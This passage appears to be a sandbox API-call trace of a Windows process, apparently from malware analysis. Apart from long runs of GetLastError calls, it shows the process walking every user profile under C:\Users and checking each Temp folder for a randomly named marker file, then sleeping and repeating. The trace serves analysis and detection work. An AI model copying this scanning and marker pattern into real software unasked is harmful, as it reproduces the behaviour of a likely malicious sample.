	[0075.425] GetLastError () returned 0x7a
	[0075.425] GetLastError () returned 0x7a
	[0075.425] GetLastError () returned 0x7a
	[0075.425] GetLastError () returned 0x7a
	[0075.425] GetLastError () returned 0x7a
	[0075.425] GetLastError () returned 0x7a
	[0075.425] GetLastError () returned 0x7a
	[0075.425] GetLastError () returned 0x7a
	[0075.425] GetLastError () returned 0x7a
	[0075.425] GetLastError () returned 0x7a
	[0075.425] GetLastError () returned 0x7a
	[0075.425] GetLastError () returned 0x7a
	[0075.425] GetLastError () returned 0x7a
	[0075.425] GetLastError () returned 0x7a
	[0075.425] GetLastError () returned 0x7a
	[0075.425] GetLastError () returned 0x7a
	[0075.425] GetLastError () returned 0x7a
	[0075.425] GetLastError () returned 0x7a
	[0075.425] GetLastError () returned 0x7a
	[0075.425] GetLastError () returned 0x7a
	[0075.425] GetLastError () returned 0x7a
	[0075.425] GetLastError () returned 0x7a
	[0075.425] GetLastError () returned 0x7a
	[0075.425] GetLastError () returned 0x7a
	[0075.425] GetLastError () returned 0x7a
	[0075.426] GetLastError () returned 0x7a
	[0075.426] GetLastError () returned 0x7a
	[0075.426] GetLastError () returned 0x7a
	[0075.426] GetLastError () returned 0x7a
	[0075.426] GetLastError () returned 0x7a
	[0075.426] GetLastError () returned 0x7a
	[0075.426] GetLastError () returned 0x7a
	[0075.426] GetLastError () returned 0x7a
	[0075.426] GetLastError () returned 0x7a
	[0075.426] GetLastError () returned 0x7a
	[0075.426] GetLastError () returned 0x7a
	[0075.426] GetLastError () returned 0x7a
	[0075.426] GetLastError () returned 0x7a
	[0075.426] GetLastError () returned 0x7a
	[0075.426] GetLastError () returned 0x7a
	[0075.426] GetLastError () returned 0x7a
	[0075.426] GetLastError () returned 0x7a
	[0075.426] GetLastError () returned 0x7a
	[0075.426] GetLastError () returned 0x7a
	[0075.426] GetLastError () returned 0x7a
	[0075.426] GetLastError () returned 0x7a
	[0075.426] GetLastError () returned 0x7a
	[0075.426] GetLastError () returned 0x7a
	[0075.426] GetLastError () returned 0x7a
	[0075.426] GetLastError () returned 0x7a
	[0075.426] GetLastError () returned 0x7a
	[0075.429] GetLastError () returned 0x7a
	[0075.429] GetLastError () returned 0x7a
	[0075.429] GetLastError () returned 0x7a
	[0075.429] GetLastError () returned 0x7a
	[0075.429] GetLastError () returned 0x7a
	[0075.429] GetLastError () returned 0x7a
	[0075.429] GetLastError () returned 0x7a
	[0075.429] GetLastError () returned 0x7a
	[0075.429] GetLastError () returned 0x7a
	[0075.429] GetLastError () returned 0x7a
	[0075.429] GetLastError () returned 0x7a
	[0075.429] GetLastError () returned 0x7a
	[0075.429] GetLastError () returned 0x7a
	[0075.429] GetLastError () returned 0x7a
	[0075.429] GetLastError () returned 0x7a
	[0075.429] GetLastError () returned 0x7a
	[0075.429] GetLastError () returned 0x7a
	[0075.429] GetLastError () returned 0x7a
	[0075.429] GetLastError () returned 0x7a
	[0075.429] GetLastError () returned 0x7a
	[0075.429] GetLastError () returned 0x7a
	[0075.429] GetLastError () returned 0x7a
	[0075.429] GetLastError () returned 0x7a
	[0075.429] GetLastError () returned 0x7a
	[0075.429] GetLastError () returned 0x7a
	[0075.429] GetLastError () returned 0x7a
	[0075.429] GetLastError () returned 0x7a
	[0075.429] GetLastError () returned 0x7a
	[0075.429] GetLastError () returned 0x7a
	[0075.429] GetLastError () returned 0x7a
	[0075.429] GetLastError () returned 0x7a
	[0075.429] GetLastError () returned 0x7a
	[0075.429] GetLastError () returned 0x7a
	[0075.429] GetLastError () returned 0x7a
	[0075.429] GetLastError () returned 0x7a
	[0075.429] GetLastError () returned 0x7a
	[0075.429] GetLastError () returned 0x7a
	[0075.429] GetLastError () returned 0x7a
	[0075.429] GetLastError () returned 0x7a
	[0075.429] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.430] GetLastError () returned 0x7a
	[0075.431] GetLastError () returned 0x7a
	[0075.431] GetLastError () returned 0x7a
	[0075.431] GetLastError () returned 0x7a
	[0075.431] GetLastError () returned 0x7a
	[0075.431] GetLastError () returned 0x7a
	[0075.431] GetLastError () returned 0x7a
	[0075.431] GetLastError () returned 0x7a
	[0075.431] GetLastError () returned 0x7a
	[0075.431] GetLastError () returned 0x7a
	[0075.431] GetLastError () returned 0x7a
	[0075.431] GetLastError () returned 0x7a
	[0075.431] GetLastError () returned 0x7a
	[0075.431] GetLastError () returned 0x7a
	[0075.431] GetLastError () returned 0x7a
	[0075.431] GetLastError () returned 0x7a
	[0075.431] GetLastError () returned 0x7a
	[0075.431] GetLastError () returned 0x7a
	[0075.431] GetLastError () returned 0x7a
	[0075.431] GetLastError () returned 0x7a
	[0075.431] GetLastError () returned 0x7a
	[0075.431] GetLastError () returned 0x7a
	[0075.431] GetLastError () returned 0x7a
	[0075.431] wsprintfW (in: param_1=0x7715e8, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\All Users\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 52
	[0075.431] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\all users\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0075.431] GetLastError () returned 0x3
	[0075.431] GetLastError () returned 0x3
	[0075.431] GetLastError () returned 0x3
	[0075.431] GetLastError () returned 0x3
	[0075.431] GetLastError () returned 0x3
	[0075.431] GetLastError () returned 0x3
	[0075.431] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.432] GetLastError () returned 0x3
	[0075.433] GetLastError () returned 0x3
	[0075.433] GetLastError () returned 0x3
	[0075.433] GetLastError () returned 0x3
	[0075.433] GetLastError () returned 0x3
	[0075.433] GetLastError () returned 0x3
	[0075.433] GetLastError () returned 0x3
	[0075.433] GetLastError () returned 0x3
	[0075.433] GetLastError () returned 0x3
	[0075.433] GetLastError () returned 0x3
	[0075.433] GetLastError () returned 0x3
	[0075.433] GetLastError () returned 0x3
	[0075.433] GetLastError () returned 0x3
	[0075.433] GetLastError () returned 0x3
	[0075.433] GetLastError () returned 0x3
	[0075.433] GetLastError () returned 0x3
	[0075.433] GetLastError () returned 0x3
	[0075.433] GetLastError () returned 0x3
	[0075.433] GetLastError () returned 0x3
	[0075.433] GetLastError () returned 0x3
	[0075.433] GetLastError () returned 0x3
	[0075.433] GetLastError () returned 0x3
	[0075.433] GetLastError () returned 0x3
	[0075.433] GetLastError () returned 0x3
	[0075.433] GetLastError () returned 0x3
	[0075.433] GetLastError () returned 0x3
	[0075.433] GetLastError () returned 0x3
	[0075.433] wsprintfW (in: param_1=0x7715e8, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\All Users\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 53
	[0075.433] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\all users\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0075.433] FindNextFileW (in: hFindFile=0x726f40, lpFindFileData=0x2a6fbe4 | out: lpFindFileData=0x2a6fbe4) returned 1
	[0075.433] GetLastError () returned 0x3
	[0075.433] GetLastError () returned 0x3
	[0075.433] GetLastError () returned 0x3
	[0075.433] GetLastError () returned 0x3
	[0075.433] GetLastError () returned 0x3
	[0075.433] GetLastError () returned 0x3
	[0075.433] GetLastError () returned 0x3
	[0075.433] GetLastError () returned 0x3
	[0075.433] GetLastError () returned 0x3
	[0075.433] GetLastError () returned 0x3
	[0075.433] GetLastError () returned 0x3
	[0075.433] GetLastError () returned 0x3
	[0075.434] GetLastError () returned 0x3
	[0075.434] GetLastError () returned 0x3
	[0075.434] GetLastError () returned 0x3
	[0075.434] GetLastError () returned 0x3
	[0075.434] GetLastError () returned 0x3
	[0075.434] GetLastError () returned 0x3
	[0075.434] GetLastError () returned 0x3
	[0075.434] GetLastError () returned 0x3
	[0075.434] lstrcmpW (lpString1="Default", lpString2=".") returned 1
	[0075.434] lstrcmpW (lpString1="Default", lpString2="..") returned 1
	[0075.434] GetLastError () returned 0x3
	[0075.434] GetLastError () returned 0x3
	[0075.434] GetLastError () returned 0x3
	[0075.434] GetLastError () returned 0x3
	[0075.434] GetLastError () returned 0x3
	[0075.434] GetLastError () returned 0x3
	[0075.434] GetLastError () returned 0x3
	[0075.434] GetLastError () returned 0x3
	[0075.434] GetLastError () returned 0x3
	[0075.434] GetLastError () returned 0x3
	[0075.434] GetLastError () returned 0x3
	[0075.434] GetLastError () returned 0x3
	[0075.434] GetLastError () returned 0x3
	[0075.434] GetLastError () returned 0x3
	[0075.434] GetLastError () returned 0x3
	[0075.434] GetLastError () returned 0x3
	[0075.434] GetLastError () returned 0x3
	[0075.434] GetLastError () returned 0x3
	[0075.434] GetLastError () returned 0x3
	[0075.434] GetLastError () returned 0x3
	[0075.434] GetLastError () returned 0x3
	[0075.434] GetLastError () returned 0x3
	[0075.434] GetLastError () returned 0x3
	[0075.434] GetLastError () returned 0x3
	[0075.434] GetLastError () returned 0x3
	[0075.434] GetLastError () returned 0x3
	[0075.434] GetLastError () returned 0x3
	[0075.434] GetLastError () returned 0x3
	[0075.434] GetLastError () returned 0x3
	[0075.434] GetLastError () returned 0x3
	[0075.434] GetLastError () returned 0x3
	[0075.434] GetLastError () returned 0x3
	[0075.434] GetLastError () returned 0x3
	[0075.434] GetLastError () returned 0x3
	[0075.434] GetLastError () returned 0x3
	[0075.434] GetLastError () returned 0x3
	[0075.434] GetLastError () returned 0x3
	[0075.434] GetLastError () returned 0x3
	[0075.434] GetLastError () returned 0x3
	[0075.434] GetLastError () returned 0x3
	[0075.434] GetLastError () returned 0x3
	[0075.435] GetLastError () returned 0x3
	[0075.435] GetLastError () returned 0x3
	[0075.435] GetLastError () returned 0x3
	[0075.435] GetLastError () returned 0x3
	[0075.435] GetLastError () returned 0x3
	[0075.435] GetLastError () returned 0x3
	[0075.435] GetLastError () returned 0x3
	[0075.435] GetLastError () returned 0x3
	[0075.435] GetLastError () returned 0x3
	[0075.435] wsprintfW (in: param_1=0x7715e8, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 50
	[0075.435] GetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0075.436] wsprintfW (in: param_1=0x7715e8, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 51
	[0075.436] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0075.437] FindNextFileW (in: hFindFile=0x726f40, lpFindFileData=0x2a6fbe4 | out: lpFindFileData=0x2a6fbe4) returned 1
	[0075.438] wsprintfW (in: param_1=0x7715e8, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default User\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 55
	[0075.438] GetFileAttributesW (lpFileName="C:\\Users\\Default User\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default user\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0075.439] wsprintfW (in: param_1=0x7715e8, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default User\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 56
	[0075.439] GetFileAttributesW (lpFileName="C:\\Users\\Default User\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default user\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0075.440] FindNextFileW (in: hFindFile=0x726f40, lpFindFileData=0x2a6fbe4 | out: lpFindFileData=0x2a6fbe4) returned 1
	[0075.440] FindNextFileW (in: hFindFile=0x726f40, lpFindFileData=0x2a6fbe4 | out: lpFindFileData=0x2a6fbe4) returned 1
	[0075.440] wsprintfW (in: param_1=0x7715e8, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 51
	[0075.440] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0075.441] wsprintfW (in: param_1=0x7715e8, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Nd9E1FYi\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 52
	[0075.441] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\nd9e1fyi\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0075.441] FindNextFileW (in: hFindFile=0x726f40, lpFindFileData=0x2a6fbe4 | out: lpFindFileData=0x2a6fbe4) returned 1
	[0075.441] wsprintfW (in: param_1=0x7715e8, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Public\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 49
	[0075.441] GetFileAttributesW (lpFileName="C:\\Users\\Public\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\public\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0075.441] wsprintfW (in: param_1=0x7715e8, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Public\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 50
	[0075.442] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\public\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0075.442] FindNextFileW (in: hFindFile=0x726f40, lpFindFileData=0x2a6fbe4 | out: lpFindFileData=0x2a6fbe4) returned 0
	[0075.442] FindClose (in: hFindFile=0x726f40 | out: hFindFile=0x726f40) returned 1
	[0075.442] Sleep (dwMilliseconds=0x1388) 
	[0080.566] GetProfilesDirectoryW () returned 0x0
	[0080.567] GetProfilesDirectoryW () returned 0x1
	[0080.567] GetLastError () returned 0x7a
	[0080.567] GetLastError () returned 0x7a
	[0080.567] GetLastError () returned 0x7a
	[0080.567] GetLastError () returned 0x7a
	[0080.567] GetLastError () returned 0x7a
	[0080.567] GetLastError () returned 0x7a
	[0080.567] GetLastError () returned 0x7a
	[0080.567] GetLastError () returned 0x7a
	[0080.567] GetLastError () returned 0x7a
	[0080.567] GetLastError () returned 0x7a
	[0080.567] GetLastError () returned 0x7a
	[0080.567] GetLastError () returned 0x7a
	[0080.567] GetLastError () returned 0x7a
	[0080.568] GetLastError () returned 0x7a
	[0080.568] GetLastError () returned 0x7a
	[0080.568] GetLastError () returned 0x7a
	[0080.568] GetLastError () returned 0x7a
	[0080.568] GetLastError () returned 0x7a
	[0080.568] GetLastError () returned 0x7a
	[0080.568] GetLastError () returned 0x7a
	[0080.568] FindFirstFileW (in: lpFileName="C:\\Users\\*.*", lpFindFileData=0x2a6fbe4 | out: lpFindFileData=0x2a6fbe4) returned 0x726dc0
	[0080.568] GetLastError () returned 0x7a
	[0080.568] GetLastError () returned 0x7a
	[0080.568] GetLastError () returned 0x7a
	[0080.568] GetLastError () returned 0x7a
	[0080.568] GetLastError () returned 0x7a
	[0080.568] GetLastError () returned 0x7a
	[0080.568] GetLastError () returned 0x7a
	[0080.568] GetLastError () returned 0x7a
	[0080.568] GetLastError () returned 0x7a
	[0080.568] GetLastError () returned 0x7a
	[0080.568] GetLastError () returned 0x7a
	[0080.568] GetLastError () returned 0x7a
	[0080.568] GetLastError () returned 0x7a
	[0080.568] GetLastError () returned 0x7a
	[0080.568] GetLastError () returned 0x7a
	[0080.568] GetLastError () returned 0x7a
	[0080.568] GetLastError () returned 0x7a
	[0080.568] GetLastError () returned 0x7a
	[0080.568] GetLastError () returned 0x7a
	[0080.568] GetLastError () returned 0x7a
	[0080.568] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0080.568] FindNextFileW (in: hFindFile=0x726dc0, lpFindFileData=0x2a6fbe4 | out: lpFindFileData=0x2a6fbe4) returned 1
	[0080.568] GetLastError () returned 0x7a
	[0080.568] GetLastError () returned 0x7a
	[0080.568] GetLastError () returned 0x7a
	[0080.568] GetLastError () returned 0x7a
	[0080.568] GetLastError () returned 0x7a
	[0080.568] GetLastError () returned 0x7a
	[0080.568] GetLastError () returned 0x7a
	[0080.568] GetLastError () returned 0x7a
	[0080.569] GetLastError () returned 0x7a
	[0080.569] GetLastError () returned 0x7a
	[0080.569] GetLastError () returned 0x7a
	[0080.569] GetLastError () returned 0x7a
	[0080.569] GetLastError () returned 0x7a
	[0080.569] GetLastError () returned 0x7a
	[0080.569] GetLastError () returned 0x7a
	[0080.569] GetLastError () returned 0x7a
	[0080.569] GetLastError () returned 0x7a
	[0080.569] GetLastError () returned 0x7a
	[0080.569] GetLastError () returned 0x7a
	[0080.569] GetLastError () returned 0x7a
	[0080.569] lstrcmpW (lpString1="..", lpString2=".") returned 1
	[0080.569] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0080.569] FindNextFileW (in: hFindFile=0x726dc0, lpFindFileData=0x2a6fbe4 | out: lpFindFileData=0x2a6fbe4) returned 1
	[0080.569] GetLastError () returned 0x7a
	[0080.569] GetLastError () returned 0x7a
	[0080.569] GetLastError () returned 0x7a
	[0080.569] GetLastError () returned 0x7a
	[0080.569] GetLastError () returned 0x7a
	[0080.569] GetLastError () returned 0x7a
	[0080.569] GetLastError () returned 0x7a
	[0080.569] GetLastError () returned 0x7a
	[0080.569] GetLastError () returned 0x7a
	[0080.569] GetLastError () returned 0x7a
	[0080.569] GetLastError () returned 0x7a
	[0080.569] GetLastError () returned 0x7a
	[0080.569] GetLastError () returned 0x7a
	[0080.569] GetLastError () returned 0x7a
	[0080.569] GetLastError () returned 0x7a
	[0080.569] GetLastError () returned 0x7a
	[0080.569] GetLastError () returned 0x7a
	[0080.569] GetLastError () returned 0x7a
	[0080.569] GetLastError () returned 0x7a
	[0080.569] GetLastError () returned 0x7a
	[0080.569] lstrcmpW (lpString1="All Users", lpString2=".") returned 1
	[0080.569] lstrcmpW (lpString1="All Users", lpString2="..") returned 1
	[0080.569] GetLastError () returned 0x7a
	[0080.569] GetLastError () returned 0x7a
	[0080.569] GetLastError () returned 0x7a
	[0080.569] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.570] GetLastError () returned 0x7a
	[0080.571] GetLastError () returned 0x7a
	[0080.571] GetLastError () returned 0x7a
	[0080.571] GetLastError () returned 0x7a
	[0080.571] GetLastError () returned 0x7a
	[0080.571] GetLastError () returned 0x7a
	[0080.571] GetLastError () returned 0x7a
	[0080.571] GetLastError () returned 0x7a
	[0080.571] GetLastError () returned 0x7a
	[0080.571] GetLastError () returned 0x7a
	[0080.571] GetLastError () returned 0x7a
	[0080.571] GetLastError () returned 0x7a
	[0080.571] GetLastError () returned 0x7a
	[0080.571] GetLastError () returned 0x7a
	[0080.571] GetLastError () returned 0x7a
	[0080.571] GetLastError () returned 0x7a
	[0080.571] GetLastError () returned 0x7a
	[0080.571] GetLastError () returned 0x7a
	[0080.571] GetLastError () returned 0x7a
	[0080.571] GetLastError () returned 0x7a
	[0080.571] GetLastError () returned 0x7a
	[0080.571] GetLastError () returned 0x7a
	[0080.571] GetLastError () returned 0x7a
	[0080.571] GetLastError () returned 0x7a
	[0080.571] GetLastError () returned 0x7a
	[0080.571] GetLastError () returned 0x7a
	[0080.571] GetLastError () returned 0x7a
	[0080.571] GetLastError () returned 0x7a
	[0080.571] GetLastError () returned 0x7a
	[0080.571] GetLastError () returned 0x7a
	[0080.571] GetLastError () returned 0x7a
	[0080.571] GetLastError () returned 0x7a
	[0080.571] GetLastError () returned 0x7a
	[0080.571] GetLastError () returned 0x7a
	[0080.571] GetLastError () returned 0x7a
	[0080.571] GetLastError () returned 0x7a
	[0080.571] GetLastError () returned 0x7a
	[0080.571] GetLastError () returned 0x7a
	[0080.571] GetLastError () returned 0x7a
	[0080.571] GetLastError () returned 0x7a
	[0080.571] GetLastError () returned 0x7a
	[0080.571] GetLastError () returned 0x7a
	[0080.571] GetLastError () returned 0x7a
	[0080.571] GetLastError () returned 0x7a
	[0080.571] GetLastError () returned 0x7a
	[0080.571] GetLastError () returned 0x7a
	[0080.571] GetLastError () returned 0x7a
	[0080.571] GetLastError () returned 0x7a
	[0080.571] GetLastError () returned 0x7a
	[0080.572] GetLastError () returned 0x7a
	[0080.572] GetLastError () returned 0x7a
	[0080.572] GetLastError () returned 0x7a
	[0080.572] GetLastError () returned 0x7a
	[0080.572] GetLastError () returned 0x7a
	[0080.572] GetLastError () returned 0x7a
	[0080.572] GetLastError () returned 0x7a
	[0080.572] GetLastError () returned 0x7a
	[0080.572] GetLastError () returned 0x7a
	[0080.572] GetLastError () returned 0x7a
	[0080.572] GetLastError () returned 0x7a
	[0080.572] GetLastError () returned 0x7a
	[0080.572] GetLastError () returned 0x7a
	[0080.572] GetLastError () returned 0x7a
	[0080.572] GetLastError () returned 0x7a
	[0080.572] GetLastError () returned 0x7a
	[0080.572] GetLastError () returned 0x7a
	[0080.572] GetLastError () returned 0x7a
	[0080.572] GetLastError () returned 0x7a
	[0080.572] GetLastError () returned 0x7a
	[0080.572] GetLastError () returned 0x7a
	[0080.572] GetLastError () returned 0x7a
	[0080.572] GetLastError () returned 0x7a
	[0080.572] GetLastError () returned 0x7a
	[0080.572] GetLastError () returned 0x7a
	[0080.572] GetLastError () returned 0x7a
	[0080.572] GetLastError () returned 0x7a
	[0080.572] GetLastError () returned 0x7a
	[0080.572] GetLastError () returned 0x7a
	[0080.572] GetLastError () returned 0x7a
	[0080.572] GetLastError () returned 0x7a
